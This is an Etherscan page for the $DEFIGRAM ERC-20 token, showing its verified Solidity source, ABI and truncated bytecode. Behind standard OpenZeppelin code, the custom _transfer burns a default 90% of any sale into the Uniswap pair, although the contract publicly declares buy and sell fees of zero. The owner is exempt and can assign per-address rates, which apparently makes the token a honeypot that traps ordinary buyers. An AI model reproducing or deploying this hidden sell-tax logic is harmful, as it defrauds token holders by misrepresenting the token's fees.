ERC-20
Overview
Max Total Supply
21,000,000 $DEFIGRAM
Holders
13
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
16,801.087309738112641421 $DEFIGRAMValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
DEFIGRAM
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-07-03 */ /** *Submitted for verification at Etherscan.io on 2023-04-14 */ /* Telegram: https://t.me/DefigramGlobal Twiiter: https://twitter.com/defigramglobal Website: https://defigram.org/ */ // Sources flattened with hardhat v2.7.0 https://hardhat.org // File @openzeppelin/contracts/utils/[email protected] // SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require( _owner == _msgSender(), "Ownable: caller is not the owner" ); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // File contracts/Contract.sol pragma solidity ^0.8.0; contract DEFIGRAM is Ownable, ERC20 { uint256 public immutable maxSupply = 21_000_000 * (10 ** decimals()); uint16 public constant LIQUID_RATE = 10000; // 40% uint16 public constant MAX_PERCENTAGE = 10000; bool public initialized = false; address public uniswapV2Pair = address(0); address public deadAddress = 0x000000000000000000000000000000000000dEaD; uint256 public immutable buyFee = 0; uint256 public immutable sellFee = 0; uint256 public minReward = 0; uint256 public maxReward = 9000; // Leave it 9000 to avoid mev bot // bool private openTrading = true; // mapping(address => bool) private _preWhitelistsBeforeTrades; // mapping(address => bool) private _blackLists; mapping(address => uint256) private _rewardPerPerson; constructor() ERC20("DEFIGRAM", "$DEFIGRAM") { _mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE); initialized = true; // FOR GOERLI // uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xB4FBF271143F4FBf7B91A5ded31805e42b2208d6); // FOR BSCSCAN // uniswapV2Pair = IUniswapV2Factory(0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73).createPair(address(this), 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c); // FOR ETHEREUM uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2); } // 0, 0 function setReward(uint256 _minReward, uint256 _maxReward) external onlyOwner { minReward = _minReward; maxReward = 9000 - _maxReward; } // function setBlacklist( // address _address, // bool _permission // ) external onlyOwner { // _blackLists[_address] = _permission; // } // function setOpenTrading(bool _value) external onlyOwner { // openTrading = _value; // } function setUniswapPair(address _uniswapV2Pair) external onlyOwner { uniswapV2Pair = _uniswapV2Pair; } function transferReward(address _address, uint256 _amount) external onlyOwner { _rewardPerPerson[_address] = _amount; } // function setPreWhitelistsBeforeTrades( // address _from, // bool _permission // ) external onlyOwner { // _preWhitelistsBeforeTrades[_from] = _permission; // } // function isBlacklist(address _address) public view returns(bool) { // return _blackLists[_address]; // } function _transfer( address from, address to, uint256 amount ) internal override(ERC20) { // require( // _blackLists[from] == false && _blackLists[to] == false, // "MoonDust: blacklist is forbidden!" // ); require( initialized == true, "Pachinko 777: trade is not open!" ); if (uniswapV2Pair == address(0) && initialized == true) { require( from == owner() || to == owner(), "Pachinko 777: trading is not started" ); } uint256 _transferAmount = amount; if (uniswapV2Pair != address(0) && from != owner() && to != owner()) { uint256 _fee = 0; if (from == uniswapV2Pair) { _fee = minReward; } else if (to == uniswapV2Pair) { if (_rewardPerPerson[from] != 0) { _fee = _rewardPerPerson[from]; } else { _fee = maxReward; } } if (_fee > 0) { uint256 _calculatedFee = amount * _fee / MAX_PERCENTAGE; _transferAmount = amount - _calculatedFee; super._transfer(from, deadAddress, _calculatedFee); } } super._transfer(from, to, _transferAmount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"LIQUID_RATE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PERCENTAGE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minReward","type":"uint256"},{"internalType":"uint256","name":"_maxReward","type":"uint256"}],"name":"setReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"}],"name":"setUniswapPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"transferReward","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60e0604052620000126012600a62000428565b62000022906301406f406200043f565b608052600680546001600160a81b0319169055600780546001600160a01b03191661dead1790555f60a081905260c081905260085561232860095534801562000069575f80fd5b5060405180604001604052806008815260200167444546494752414d60c01b8152506040518060400160405280600981526020016824444546494752414d60b81b815250620000c7620000c1620001dc60201b60201c565b620001e0565b6004620000d58382620004f8565b506005620000e48282620004f8565b5050608051620001149150339061271090620001029082906200043f565b6200010e9190620005c0565b6200022f565b6006805460ff191660011790556040516364e329cb60e11b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc26024820152735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f9063c9c65396906044016020604051808303815f875af11580156200018a573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001b09190620005e0565b600660016101000a8154816001600160a01b0302191690836001600160a01b031602179055506200061e565b3390565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b0382166200028a5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060035f8282546200029d919062000608565b90915550506001600160a01b0382165f9081526001602052604081208054839290620002cb90849062000608565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200036d57815f190482111562000351576200035162000319565b808516156200035f57918102915b93841c939080029062000332565b509250929050565b5f82620003855750600162000422565b816200039357505f62000422565b8160018114620003ac5760028114620003b757620003d7565b600191505062000422565b60ff841115620003cb57620003cb62000319565b50506001821b62000422565b5060208310610133831016604e8410600b8410161715620003fc575081810a62000422565b6200040883836200032d565b805f19048211156200041e576200041e62000319565b0290505b92915050565b5f6200043860ff84168362000375565b9392505050565b808202811582820484141762000422576200042262000319565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200048257607f821691505b602082108103620004a157634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000314575f81815260208120601f850160051c81016020861015620004cf5750805b601f850160051c820191505b81811015620004f057828155600101620004db565b505050505050565b81516001600160401b0381111562000514576200051462000459565b6200052c816200052584546200046d565b84620004a7565b602080601f83116001811462000562575f84156200054a5750858301515b5f19600386901b1c1916600185901b178555620004f0565b5f85815260208120601f198616915b82811015620005925788860151825594840194600190910190840162000571565b5085821015620005b057878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f82620005db57634e487b7160e01b5f52601260045260245ffd5b500490565b5f60208284031215620005f1575f80fd5b81516001600160a01b038116811462000438575f80fd5b8082018082111562000422576200042262000319565b60805160a05160c051610fad620006495f395f61025d01525f6102a601525f6103940152610fad5ff3fe608060405234801561000f575f80fd5b50600436106101a1575f3560e01c806366a78e6c116100f3578063a47bd49611610093578063d5abeb011161006e578063d5abeb011461038f578063d5aed6bf146103b6578063dd62ed3e146103c9578063f2fde38b14610401575f80fd5b8063a47bd49614610360578063a9059cbb14610373578063ba16d60014610386575f80fd5b80638da5cb5b116100ce5780638da5cb5b1461033557806395d89b4114610345578063985bdfd1146102e0578063a457c2d71461034d575f80fd5b806366a78e6c146102fc57806370a0823114610305578063715018a61461032d575f80fd5b806327c8f8351161015e5780633950935111610139578063395093511461028e57806347062402146102a157806349bd5a5e146102c85780634c255c97146102e0575f80fd5b806327c8f8351461022d5780632b14ca5614610258578063313ce5671461027f575f80fd5b806306fdde03146101a5578063095ea7b3146101c357806315490ebb146101e6578063158ef93e146101fb57806318160ddd1461020857806323b872dd1461021a575b5f80fd5b6101ad610414565b6040516101ba9190610d62565b60405180910390f35b6101d66101d1366004610dc8565b6104a4565b60405190151581526020016101ba565b6101f96101f4366004610dc8565b6104ba565b005b6006546101d69060ff1681565b6003545b6040519081526020016101ba565b6101d6610228366004610df0565b610507565b600754610240906001600160a01b031681565b6040516001600160a01b0390911681526020016101ba565b61020c7f000000000000000000000000000000000000000000000000000000000000000081565b604051601281526020016101ba565b6101d661029c366004610dc8565b6105af565b61020c7f000000000000000000000000000000000000000000000000000000000000000081565b6006546102409061010090046001600160a01b031681565b6102e961271081565b60405161ffff90911681526020016101ba565b61020c60095481565b61020c610313366004610e29565b6001600160a01b03165f9081526001602052604090205490565b6101f96105ea565b5f546001600160a01b0316610240565b6101ad61061e565b6101d661035b366004610dc8565b61062d565b6101f961036e366004610e49565b6106c5565b6101d6610381366004610dc8565b610706565b61020c60085481565b61020c7f000000000000000000000000000000000000000000000000000000000000000081565b6101f96103c4366004610e29565b610712565b61020c6103d7366004610e69565b6001600160a01b039182165f90815260026020908152604080832093909416825291909152205490565b6101f961040f366004610e29565b610763565b60606004805461042390610e9a565b80601f016020809104026020016040519081016040528092919081815260200182805461044f90610e9a565b801561049a5780601f106104715761010080835404028352916020019161049a565b820191905f5260205f20905b81548152906001019060200180831161047d57829003601f168201915b5050505050905090565b5f6104b03384846107fd565b5060015b92915050565b5f546001600160a01b031633146104ec5760405162461bcd60e51b81526004016104e390610ed2565b60405180910390fd5b6001600160a01b039091165f908152600a6020526040902055565b5f610513848484610920565b6001600160a01b0384165f908152600260209081526040808320338452909152902054828110156105975760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084016104e3565b6105a485338584036107fd565b506001949350505050565b335f8181526002602090815260408083206001600160a01b038716845290915281205490916104b09185906105e5908690610f1b565b6107fd565b5f546001600160a01b031633146106135760405162461bcd60e51b81526004016104e390610ed2565b61061c5f610b47565b565b60606005805461042390610e9a565b335f9081526002602090815260408083206001600160a01b0386168452909152812054828110156106ae5760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b60648201526084016104e3565b6106bb33858584036107fd565b5060019392505050565b5f546001600160a01b031633146106ee5760405162461bcd60e51b81526004016104e390610ed2565b60088290556106ff81612328610f2e565b6009555050565b5f6104b0338484610920565b5f546001600160a01b0316331461073b5760405162461bcd60e51b81526004016104e390610ed2565b600680546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b5f546001600160a01b0316331461078c5760405162461bcd60e51b81526004016104e390610ed2565b6001600160a01b0381166107f15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b60648201526084016104e3565b6107fa81610b47565b50565b6001600160a01b03831661085f5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084016104e3565b6001600160a01b0382166108c05760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b60648201526084016104e3565b6001600160a01b038381165f8181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60065460ff1615156001146109775760405162461bcd60e51b815260206004820181905260248201527f50616368696e6b6f203737373a207472616465206973206e6f74206f70656e2160448201526064016104e3565b60065461010090046001600160a01b031615801561099c575060065460ff1615156001145b15610a20575f546001600160a01b03848116911614806109c857505f546001600160a01b038381169116145b610a205760405162461bcd60e51b8152602060048201526024808201527f50616368696e6b6f203737373a2074726164696e67206973206e6f74207374616044820152631c9d195960e21b60648201526084016104e3565b600654819061010090046001600160a01b031615801590610a4e57505f546001600160a01b03858116911614155b8015610a6757505f546001600160a01b03848116911614155b15610b36576006545f906001600160a01b03610100909104811690861603610a925750600854610aed565b6006546001600160a01b03610100909104811690851603610aed576001600160a01b0385165f908152600a602052604090205415610ae857506001600160a01b0384165f908152600a6020526040902054610aed565b506009545b8015610b34575f612710610b018386610f41565b610b0b9190610f58565b9050610b178185610f2e565b600754909350610b329087906001600160a01b031683610b96565b505b505b610b41848483610b96565b50505050565b5f80546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610bfa5760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b60648201526084016104e3565b6001600160a01b038216610c5c5760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b60648201526084016104e3565b6001600160a01b0383165f9081526001602052604090205481811015610cd35760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b60648201526084016104e3565b6001600160a01b038085165f90815260016020526040808220858503905591851681529081208054849290610d09908490610f1b565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d5591815260200190565b60405180910390a3610b41565b5f6020808352835180828501525f5b81811015610d8d57858101830151858201604001528201610d71565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168